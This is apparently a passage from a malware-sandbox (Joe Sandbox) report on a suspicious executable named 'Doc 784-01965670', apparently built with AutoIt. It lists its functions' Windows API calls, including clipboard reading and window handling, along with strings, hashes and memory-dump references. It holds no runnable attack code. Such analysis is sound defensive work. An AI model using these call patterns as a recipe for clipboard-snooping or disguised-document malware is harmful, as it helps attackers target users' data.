                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1582027408-0
                                                                                                                                    • Opcode ID: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                                                    • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                    • Opcode Fuzzy Hash: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                                                    • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                                    Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 589737431-2761332787
                                                                                                                                    • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                    • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                    • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                    • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                                    Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                                    • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                                    • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                                    • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                    • String ID: ($,$tooltips_class32
                                                                                                                                    • API String ID: 541082891-3320066284
                                                                                                                                    • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                    • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                    • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                    • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                                    Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                                    • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                                    • _wcslen.LIBCMT ref: 00454E04
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                                    • _wcslen.LIBCMT ref: 00454E24
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                                      • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                                    • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                                    • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                                    • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                    • API String ID: 2511167534-1154884017
                                                                                                                                    • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                    • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                                    • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                    • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                                    Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                                    • _wcslen.LIBCMT ref: 00436B79
                                                                                                                                    • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                                    • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                                    • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                                    • _wcscat.LIBCMT ref: 00436C31
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                    • API String ID: 1503153545-1459072770
                                                                                                                                    • Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                                    • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                                    • Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                                    • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                                    Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                                    • _fseek.LIBCMT ref: 004527FC
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                                    • _wcscpy.LIBCMT ref: 00452871
                                                                                                                                    • _wcscat.LIBCMT ref: 00452886
                                                                                                                                    • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                                    • _wcscat.LIBCMT ref: 004528C8
                                                                                                                                    • _wcscat.LIBCMT ref: 004528DD
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                                    • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2054058615-0
                                                                                                                                    • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                    • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                                    • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                    • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                                    Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                    • Opcode ID: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                                                    • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                                    • Opcode Fuzzy Hash: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                                                    • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                                    Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                    • API String ID: 867697134-248962490
                                                                                                                                    • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                                    • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                    • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                                    • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                    Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2353593579-4108050209
                                                                                                                                    • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                    • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                    • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                    • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                    Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                                    • GetWindowDC.USER32 ref: 0044A277
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1744303182-0
                                                                                                                                    • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                    • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                    • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                    • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                    Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                    • API String ID: 790654849-1810252412
                                                                                                                                    • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                    • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                                    • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                    • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                                    Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
